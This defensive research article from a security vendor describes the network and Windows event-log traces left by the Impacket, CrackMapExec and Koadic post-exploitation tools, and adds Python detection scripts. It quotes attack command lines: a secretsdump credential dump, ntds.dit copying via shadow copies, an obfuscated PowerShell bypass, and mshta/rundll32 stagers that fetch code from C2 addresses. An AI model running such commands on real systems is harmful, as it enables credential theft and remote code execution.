How to detect attacks on Windows infrastructure: studying hacker tools


The number of attacks on the corporate sector grows every year: for example, in 2017, 13% more unique incidents were recorded than in 2016, and by the end of 2018 there were 27% more incidents than in the previous period. This includes organizations whose main working tool is the Windows operating system. In 2017-2018, APT Dragonfly, APT28 and APT MuddyWater attacked government and military organizations in Europe, North America and Saudi Arabia. They used three tools for this: Impacket, CrackMapExec and Koadic. Their source code is open and available on GitHub.

It should be noted that these tools are not used for initial penetration, but for developing an attack inside the infrastructure. Attackers use them at different stages of the attack that follow the breach of the perimeter. This, by the way, is hard to detect, and often only with technologies that detect traces of compromise in network traffic, or with tools that reveal the active actions of an attacker who is already inside the infrastructure. The tools provide a variety of functions, from file transfer to interacting with the registry and executing commands on a remote machine. We studied these tools to determine their network activity.

What we needed to do:

  • Understand how the hacking tools work. Find out what attackers need in order to exploit them and which technologies they can use.
  • Find what information security tools do not detect at the first stages of an attack. The reconnaissance stage can be skipped, either because the attacker is an insider, or because the attacker exploits a gap in the infrastructure that was not previously known. It is then possible to reconstruct the entire chain of their actions, hence the desire to detect further movement.
  • Eliminate false positives from the detection tools. We must not forget that when certain actions are detected on the basis of reconnaissance alone, frequent errors are possible. An infrastructure usually offers enough ways to obtain any information that are indistinguishable from legitimate ones at first glance.

What do these tools give attackers? In the case of Impacket, attackers get a large library of modules that can be used at different stages of the attack following the breach of the perimeter. Many tools use Impacket modules internally, for example Metasploit. It has dcomexec and wmiexec for remote command execution, and secretsdump for obtaining accounts from memory, all of which are taken from Impacket. As a result, correct detection of the activity of this library will ensure the detection of its derivatives.

It is no coincidence that the creators of CrackMapExec (or simply CME) wrote "Powered by Impacket" about it. In addition, CME has ready-made functionality for popular scenarios: Mimikatz for obtaining passwords or their hashes, deployment of a Meterpreter or Empire agent for remote execution, and Bloodhound on board.

The third tool we chose is Koadic. It is quite new: it was presented at the international hacker conference DEFCON 25 in 2017 and is distinguished by a non-standard approach: it works through HTTP, JavaScript and Microsoft Visual Basic Script (VBS). This approach is called living off the land: the tool uses a set of dependencies and libraries built into Windows. The creators call it COM Command & Control, or C3.

IMPACKET

The functionality of Impacket is very wide, ranging from reconnaissance inside AD and collecting data from internal MS SQL servers to techniques for obtaining credentials: an SMB relay attack, and obtaining the ntds.dit file, which contains the user password hashes, from the domain controller. Impacket also executes commands remotely using four different methods: WMI, the Windows Scheduler Management Service, DCOM and SMB, and requires credentials to do so.

Secretsdump

Let's take a look at secretsdump. This is a module that can target both user machines and domain controllers. It can be used to obtain copies of the LSA, SAM, SECURITY and NTDS.dit memory areas, so it can be seen at different stages of the attack. The first step in the module's operation is authentication via SMB, which requires either the user's password or its hash in order to carry out a Pass the Hash attack automatically. Next comes a request to open access to the Service Control Manager (SCM) and to obtain access to the registry via the winreg protocol, with which the attacker can read the data of the branches of interest and retrieve the results via SMB.

In Fig. 1 we see exactly how, using the winreg protocol, access to the LSA registry key is obtained. To do this, the DCERPC command with opcode 15, OpenKey, is used.

Fig. 1. Opening a registry key using the winreg protocol

Next, once access to the key is obtained, the values are saved with the SaveKey command, opcode 20. Impacket does this in a very specific way: it saves the values to a file whose name is a string of 8 random characters with .tmp appended. In addition, this file is then uploaded via SMB from the System32 directory (Fig. 2).

Fig. 2. Scheme for obtaining registry keys from a remote machine

It turns out that such activity can be detected on the network by requests for certain registry branches over the winreg protocol, by specific names, and by the commands and their order.

This module also leaves traces in the Windows event log, which makes it easy to detect. For example, as a result of executing the command

secretsdump.py -debug -system SYSTEM -sam SAM -ntds NTDS -security SECURITY -bootkey BOOTKEY -outputfile 1.txt -use-vss -exec-method mmcexec -user-status -dc-ip 192.168.202.100 -target-ip 192.168.202.100 contoso/Administrator:@DC

in the Windows Server 2016 log we will see the following key sequence of events:

1. 4624 - remote logon.
2. 5145 - checking access rights to the remote winreg service.
3. 5145 - checking access rights to a file in the System32 directory. The file has the random name mentioned above.
4. Creating a cmd.exe process that launches vssadmin:

"C:\windows\system32\cmd.exe" /Q /c echo c:\windows\system32\cmd.exe /C vssadmin list shadows ^> %SYSTEMROOT%\Temp\__output > %TEMP%\execute.bat & c:\windows\system32\cmd.exe /Q /c %TEMP%\execute.bat & del %TEMP%\execute.bat

5. Creating a process with the command:

"C:\windows\system32\cmd.exe" /Q /c echo c:\windows\system32\cmd.exe /C vssadmin create shadow /For=C: ^> %SYSTEMROOT%\Temp\__output > %TEMP%\execute.bat & c:\windows\system32\cmd.exe /Q /c %TEMP%\execute.bat & del %TEMP%\execute.bat

6. Creating a process with the command:

"C:\windows\system32\cmd.exe" /Q /c echo c:\windows\system32\cmd.exe /C copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy3\Windows\NTDS\ntds.dit %SYSTEMROOT%\Temp\rmumAfcn.tmp ^> %SYSTEMROOT%\Temp\__output > %TEMP%\execute.bat & c:\windows\system32\cmd.exe /Q /c %TEMP%\execute.bat & del %TEMP%\execute.bat

7. Creating a process with the command:

"C:\windows\system32\cmd.exe" /Q /c echo c:\windows\system32\cmd.exe /C vssadmin delete shadows /For=C: /Quiet ^> %SYSTEMROOT%\Temp\__output > %TEMP%\execute.bat & c:\windows\system32\cmd.exe /Q /c %TEMP%\execute.bat & del %TEMP%\execute.bat

Smbexec

Like many post-exploitation tools, Impacket has modules for remote command execution. We will focus on smbexec, which provides an interactive command shell on a remote machine. This module also requires authentication via SMB, with either a password or a password hash. Fig. 3 shows an example of how such a tool works; in this case it is a local administrator console.

Fig. 3. Interactive smbexec console

The first step of smbexec after authentication is to open the SCM with the OpenSCManagerW command (15). The request is notable: the MachineName field is DUMMY.

Fig. 4. Request to open the Service Control Manager

Next, a service is created using the CreateServiceW command (12). In the case of smbexec we see the same command construction logic every time. In Fig. 5, green marks the command parameters that cannot be changed and yellow marks what the attacker can change. It is easy to see that the name of the executable, its directory and the output file can be changed, but the rest is much harder to change without breaking the logic of the Impacket module.

Fig. 5. Request to create a service using the Service Control Manager

Smbexec also leaves obvious traces in the Windows event log. In the Windows Server 2016 log, for an interactive command shell running the ipconfig command, we will see the following key sequence of events:

1. Installation of the service on the victim's machine:

%COMSPEC% /Q /c echo cd ^> \\127.0.0.1\C$\__output 2^>^&1 > %TEMP%\execute.bat & %COMSPEC% /Q /c %TEMP%\execute.bat & del %TEMP%\execute.bat

2. 4688 - creating a cmd.exe process with the arguments from the previous item.
3. 5145 - checking access rights to the __output file in the C$ share.
4. 4697 - installation of the service on the victim's machine:

%COMSPEC% /Q /c echo ipconfig ^> \\127.0.0.1\C$\__output 2^>^&1 > %TEMP%\execute.bat & %COMSPEC% /Q /c %TEMP%\execute.bat & del %TEMP%\execute.bat

5. 4688 - creating a cmd.exe process with the arguments from the previous item.
6. 5145 - checking access rights to the __output file in the C$ share.
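As an added example (not code from the article or from Impacket), the following Python triages a constructed set of event records for the artifacts listed in both the secretsdump and the smbexec sequences above: remote winreg access, a random 8-character .tmp file under System32, and the echo-to-.bat / run / del chain visible in the 4688 and 4697 command lines. The record field names and sample values are assumptions made for the example, not a real log format.

```python
import re

# Structural signature shared by the secretsdump and smbexec command lines:
# "echo <cmd> ^> <output> ... > <x>.bat & ... <x>.bat & del <x>.bat".
# The output and .bat names are captured instead of hard-coded, because the
# article notes that an attacker can rename the output file.
ECHO_RUN_DEL = re.compile(r"echo .+?\^> \S+.*?> (%TEMP%\\\S+\.bat) & .*?\1 & del \1", re.I)
# secretsdump's registry save file: 8 letters plus .tmp, read from System32.
TMP_IN_SYSTEM32 = re.compile(r"(?:^|\\)System32\\[A-Za-z]{8}\.tmp$", re.I)

def is_echo_run_del(cmdline):
    """True when a command line carries the Impacket echo/run/del .bat chain."""
    return ECHO_RUN_DEL.search(cmdline) is not None

def triage(events):
    """Return one finding per event that carries an Impacket artifact."""
    findings = []
    for ev in events:
        if ev["id"] == 5145 and ev.get("target", "").lower() == "winreg":
            findings.append("5145: access check on the remote winreg service")
        elif ev["id"] == 5145 and TMP_IN_SYSTEM32.search(ev.get("target", "")):
            findings.append("5145: random 8-char .tmp under System32 (secretsdump save)")
        elif ev["id"] in (4688, 4697) and is_echo_run_del(ev.get("cmdline", "")):
            findings.append(f"{ev['id']}: echo/run/del .bat chain (secretsdump/smbexec style)")
    return findings

# Constructed sample events (field names are an assumption), modelled on the
# Windows Server 2016 sequences described in the article.
SAMPLE_EVENTS = [
    {"id": 4624, "logon_type": 3},
    {"id": 5145, "target": "winreg"},
    {"id": 5145, "target": r"Windows\System32\rmumAfcn.tmp"},
    {"id": 4688, "cmdline": r'"C:\windows\system32\cmd.exe" /Q /c echo c:\windows\system32\cmd.exe /C '
                            r'vssadmin list shadows ^> %SYSTEMROOT%\Temp\__output > %TEMP%\execute.bat & '
                            r'c:\windows\system32\cmd.exe /Q /c %TEMP%\execute.bat & del %TEMP%\execute.bat'},
    {"id": 4697, "cmdline": r'%COMSPEC% /Q /c echo ipconfig ^> \\127.0.0.1\C$\__output 2^>^&1 > '
                            r'%TEMP%\execute.bat & %COMSPEC% /Q /c %TEMP%\execute.bat & del %TEMP%\execute.bat'},
    {"id": 4688, "cmdline": r'"C:\windows\system32\cmd.exe" /c ipconfig /all'},  # ordinary admin use
]

if __name__ == "__main__":
    for finding in triage(SAMPLE_EVENTS):
        print(finding)
```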

Impacket is the foundation on which attack tools are built. It supports almost all the protocols found in a Windows infrastructure, and at the same time it has its own characteristic features: the specific winreg requests, the use of the SCM API with its characteristic command construction, the file name format, and the SMB share for SYSTEM32.

CRACKMAPEXEC

The CME tool is designed above all to automate the routine actions an attacker has to take in order to advance within the network. It can work together with the well-known Empire agent and Meterpreter. To execute commands covertly, CME can obfuscate them. Using Bloodhound (a separate reconnaissance tool), an attacker can automate the search for active domain administrator sessions.

Bloodhound

Bloodhound, as a standalone tool, allows advanced reconnaissance within the network. It collects data about users, machines, groups and sessions and is delivered as a PowerShell script or a binary. LDAP or SMB is used to collect the information. The CME integration module lets Bloodhound be downloaded to the victim's machine, run, and the collected data retrieved after execution, thereby automating the actions on the system and making them less noticeable. The Bloodhound graphical shell presents the collected data as graphs, which makes it possible to find the shortest path from the attacker's machine to a domain administrator.

Fig. 6. Bloodhound interface

To run on the victim's machine, the module creates a task using ATSVC and SMB. ATSVC is the interface for working with the Windows Task Scheduler. CME uses its NetrJobAdd(1) function to create tasks over the network. An example of what the CME module sends is shown in Fig. 7: it is a call to cmd.exe with obfuscated code as its arguments, in XML format.

Fig. 7. Creating a task via CME

After the task is submitted for execution, the victim's machine launches Bloodhound itself, and this can be seen in the traffic. The module is characterized by LDAP queries to obtain the standard groups and the list of all machines and users in the domain, and by obtaining information about active user sessions through the SRVSVC NetSessEnum request.

Fig. 8. Obtaining the list of active sessions via SMB

In addition, launching Bloodhound on the victim's machine is accompanied by an event with ID 4688 (process creation) and the process name «C:\Windows\System32\cmd.exe». What is notable about it is the command line arguments:

cmd.exe /Q /c powershell.exe -exec bypass -noni -nop -w 1 -C " & ( $eNV:cOmSPEc[4,26,25]-JOiN'')( [chAR[]](91 , 78, 101,116 , 46, 83 , 101 , … , 40,41 )-jOIN'' ) "
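As an added example (not from the article or from CME), the Python below works through the two obfuscation tricks in that command line so an analyst can flag it: `$env:COMSPEC[4,26,25]-join''` selects characters 4, 26 and 25 of the default `C:\Windows\system32\cmd.exe`, and `[char[]](91,78,...)-join''` rebuilds a string from character codes. The sample keeps only the character codes visible in the article, and the default COMSPEC value is an assumption.

```python
import re

DEFAULT_COMSPEC = r"C:\Windows\system32\cmd.exe"  # assumed %COMSPEC% on the victim

# Constructed sample shaped like the 4688 command line quoted above; the char-code
# list is truncated in the article, so only its visible prefix is included here.
SAMPLE = ("cmd.exe /Q /c powershell.exe -exec bypass -noni -nop -w 1 -C \" & "
          "( $eNV:cOmSPEc[4,26,25]-JOiN'')( [chAR[]](91 , 78, 101,116 , 46, 83 , 101 )-jOIN'' ) \"")

ENV_INDEX = re.compile(r"\$env:(\w+)\[([\d,\s]+)\]\s*-join\s*''", re.I)
CHAR_ARRAY = re.compile(r"\[char\[\]\]\(([\d,\s]+)\)\s*-join\s*''", re.I)

def resolve_env_index(cmdline, env):
    """Rebuild the word that $env:NAME[i,j,k]-join'' picks out of an environment variable."""
    m = ENV_INDEX.search(cmdline)
    if not m:
        return None
    value = env.get(m.group(1).upper(), "")
    indices = [int(i) for i in m.group(2).split(",")]
    return "".join(value[i] for i in indices if i < len(value))

def decode_char_array(cmdline):
    """Turn [char[]](n, n, ...)-join'' back into the string it hides."""
    m = CHAR_ARRAY.search(cmdline)
    if not m:
        return None
    return "".join(chr(int(c)) for c in m.group(1).split(","))

def flag_powershell_4688(cmdline, env=None):
    """Return the reasons this process-creation command line deserves attention."""
    env = env or {"COMSPEC": DEFAULT_COMSPEC}
    hits = []
    if re.search(r"-exec\s+bypass", cmdline, re.I):
        hits.append("execution policy bypass")
    if re.search(r"\s-w\s+1\b", cmdline, re.I):
        hits.append("hidden window")
    verb = resolve_env_index(cmdline, env)
    if verb:
        hits.append(f"env-indexed verb resolves to '{verb}'")
    payload = decode_char_array(cmdline)
    if payload:
        hits.append(f"char-array payload begins '{payload}'")
    return hits

if __name__ == "__main__":
    print(flag_powershell_4688(SAMPLE))
```

On the sample the indexed verb resolves to `iex` (Invoke-Expression) and the visible char codes decode to `[Net.Se`, the start of a .NET type name.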

Enum_avproducts

The enum_avproducts module is very interesting in terms of both functionality and implementation. WMI allows the WQL query language to be used to retrieve data about various Windows objects, and this is exactly what this CME module uses. It generates queries to the AntiSpywareProduct and AntiVirusProduct classes about the protection tools installed on the victim's machine. To obtain the necessary data, the module connects to the root\SecurityCenter2 namespace, then issues a WQL query and receives the response. Fig. 9 shows the contents of such requests and responses. In our example, Windows Defender was found.

Fig. 9. Network activity of the enum_avproducts module

WMI auditing (Trace WMI-Activity), whose events contain useful information about WQL queries, is often disabled. But if it is enabled, then when the enum_avproducts script runs, an event with ID 11 will be recorded. It contains the name of the user who sent the request and the name of the root\SecurityCenter2 namespace.

Each of the CME modules has its own artifacts, whether specific WQL queries, the creation of a certain kind of task in the task scheduler with obfuscation, or the Bloodhound-specific activity in LDAP and SMB.

KOADIC

A distinctive feature of Koadic is its use of the JavaScript and VBScript interpreters built into Windows. In this sense it follows the living-off-the-land trend: it has no external dependencies and uses standard Windows tools. It is a tool for full-fledged Command & Control (CnC), since after infection an "implant" is installed on the machine that allows it to be controlled. Such a machine, in Koadic terminology, is called a "zombie". If the privileges on the victim's side are insufficient for full operation, Koadic can elevate them using User Account Control bypass techniques (UAC bypass).

Fig. 10. Koadic shell

The victim must initiate the communication with the Command & Control server. To do this, it has to contact a prepared URI and receive the main Koadic body through one of the stagers. Fig. 11 shows an example for the mshta stager.

Fig. 11. Initiating a session with the CnC server

From the WS response variable it becomes clear that execution happens through WScript.Shell, and the STAGER, SESSIONKEY, JOBKEY, JOBKEYPATH and EXPIRE variables contain the key parameters of the current session. This is the first request-response pair in the HTTP connection with the CnC server. The subsequent requests relate directly to the functionality of the modules (implants) that are invoked. All Koadic modules work only within an active session with the CnC.

Mimikatz

Just as CME works with Bloodhound, Koadic works with Mimikatz as a separate program and has several ways of launching it. Below is the request-response pair for downloading the Mimikatz implant.

Fig. 12. Delivering Mimikatz in Koadic

You can see how the URI format of the request has changed. It now contains a value for the csrf variable, which identifies the selected module. Don't pay attention to its name; we all know that CSRF usually means something else. The response is the same main Koadic body, to which the code related to Mimikatz has been added. It is quite large, so let's look at the key points. Here we have the Mimikatz library encoded in base64, a serialized .NET class that will inject it, and the arguments for launching Mimikatz. The result of execution is transmitted over the network in clear text.

Fig. 13. Result of running Mimikatz on a remote machine

Exec_cmd

Koadic also has modules that can execute commands remotely. Here we see the same URI generation method and the familiar sid and csrf. In the case of the exec_cmd module, code capable of executing shell commands is added to the body. Below is the code contained in the HTTP response from the CnC server.

Fig. 14. Exec_cmd implant code

The GAWTUUGCFI variable with the familiar WS attribute is required for code execution. With its help the implant calls the shell, handling two code branches: shell.exec, which returns the output data stream, and shell.run, which returns nothing.

Koadic is not a typical tool, but it has artifacts of its own by which it can be found in legitimate traffic:

  • the particular way its HTTP requests are formed,
  • the use of the winHttpRequests API,
  • the creation of a WScript.Shell object via ActiveXObject,
  • the large executable body.

The stager initiates the first connection, so its activity can be detected through Windows events. For mshta this is event 4688, which indicates the creation of a process with the launch attribute:

C:\Windows\system32\mshta.exe http://192.168.211.1:9999/dXpT6

While Koadic is running, you can see other 4688 events with attributes that characterize it precisely:

rundll32.exe http://192.168.241.1:9999/dXpT6?sid=1dbef04007a64fba83edb3f3928c9c6c; csrf=;......mshtml,RunHTMLApplication
rundll32.exe http://192.168.202.136:9999/dXpT6?sid=12e0bbf6e9e5405690e5ede8ed651100;csrf=18f93a28e0874f0d8d475d154bed1983;......mshtml,RunHTMLApplication
"C:\Windows\system32\cmd.exe" /q /c chcp 437 & net session 1> C:\Users\user02\AppData\Local\Temp\6dc91b53-ddef-2357-4457-04a3c333db06.txt 2>&1
"C:\Windows\system32\cmd.exe" /q /c chcp 437 & ipconfig 1> C:\Users\user02\AppData\Local\Temp\721d2d0a-890f-9549-96bd-875a495689b7.txt 2>&1
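As an added example (not from the article or from Koadic), the Python below classifies 4688 command lines of the kinds listed above: a script host (mshta.exe or rundll32.exe) launched with an http URL, from which the sid and csrf values are parsed, and the exec_cmd pattern of `chcp 437 & <command>` redirected to a GUID-named file under Temp. The sample command lines are constructed for the example and the field names in the returned details are assumptions.

```python
import re
from urllib.parse import urlsplit

# A script host launched with an http(s) URL on its command line (Koadic stagers).
STAGER = re.compile(r"\b(mshta|rundll32)\.exe\b.*?(https?://\S+)", re.I)
# exec_cmd output: "chcp 437 & <cmd> 1> <...\Temp\<guid>.txt> 2>&1".
EXEC_CMD = re.compile(r"chcp 437 & (.+?) 1> (\S+\\Temp\\[0-9a-f-]{36}\.txt) 2>&1", re.I)

def parse_koadic_uri(url):
    """Return (host, params) for a stager URL; Koadic separates sid and csrf with ';'."""
    parts = urlsplit(url)
    params = {}
    for kv in parts.query.split(";"):
        if "=" in kv:
            key, value = kv.split("=", 1)
            params[key] = value
    return parts.netloc, params

def classify(cmdline):
    """Return (label, details) for one 4688 command line, or None when nothing matches."""
    m = STAGER.search(cmdline)
    if m:
        host, params = parse_koadic_uri(m.group(2))
        details = {"process": m.group(1).lower(), "host": host, **params}
        details["hta"] = "RunHTMLApplication" in cmdline
        return "script-host-from-url", details
    m = EXEC_CMD.search(cmdline)
    if m:
        return "exec_cmd-output-to-guid-tmp", {"command": m.group(1), "output": m.group(2)}
    return None

# Constructed command lines shaped like the 4688 events quoted above.
SAMPLES = [
    r"C:\Windows\system32\mshta.exe http://192.168.211.1:9999/dXpT6",
    "rundll32.exe http://192.168.202.136:9999/dXpT6?sid=12e0bbf6e9e5405690e5ede8ed651100;"
    "csrf=18f93a28e0874f0d8d475d154bed1983;mshtml,RunHTMLApplication",
    r'"C:\Windows\system32\cmd.exe" /q /c chcp 437 & net session 1> '
    r"C:\Users\user02\AppData\Local\Temp\6dc91b53-ddef-2357-4457-04a3c333db06.txt 2>&1",
    r'"C:\Windows\system32\cmd.exe" /c ipconfig /all',  # ordinary admin use
]

if __name__ == "__main__":
    for line in SAMPLES:
        print(classify(line))
```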

Conclusion

Living off the land is gaining popularity among criminals. They use the tools and mechanisms built into Windows for their own needs. We see the popular tools Koadic, CrackMapExec and Impacket, which follow this principle, appearing ever more often in APT reports. The number of forks of these tools on GitHub is also growing, and new ones keep appearing (there are already about a thousand of them). The trend is popular because of its simplicity: attackers do not need third-party tools; these are already on the victims' machines and help them bypass security measures. We focus on studying network communication: each of the tools described above leaves its own traces in network traffic, and a detailed study of them allowed us to teach our product PT Network Attack Discovery to detect them, which ultimately helps investigate the entire chain of cyber incidents in which they are involved.

Authors:

  • Anton Tyurin, Head of Expert Services Department, PT Expert Security Center, Positive Technologies
  • Egor Podmokov, expert, PT Expert Security Center, Positive Technologies

Source: www.habr.com
